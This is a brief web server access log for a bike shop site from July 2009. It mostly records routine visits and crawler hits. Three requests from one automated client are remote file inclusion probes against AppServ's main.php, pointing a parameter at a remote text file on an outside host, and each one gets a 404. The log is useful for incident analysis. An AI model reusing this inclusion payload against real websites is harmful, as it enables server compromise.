208.80.195.37 - - [10/Jul/2009:20:55:09 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; IEMB3; .NET CLR 2.0.50727; IEMB3)" "houstonbikeshop.com"
123.242.165.138 - - [10/Jul/2009:21:03:22 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
123.242.165.138 - - [10/Jul/2009:21:03:23 -0700] "GET /appserv/main.php?appserv_root=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
123.242.165.138 - - [10/Jul/2009:21:03:29 -0700] "GET /logs//appserv/main.php?appserv_root=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:21:05:47 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:21:05:47 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
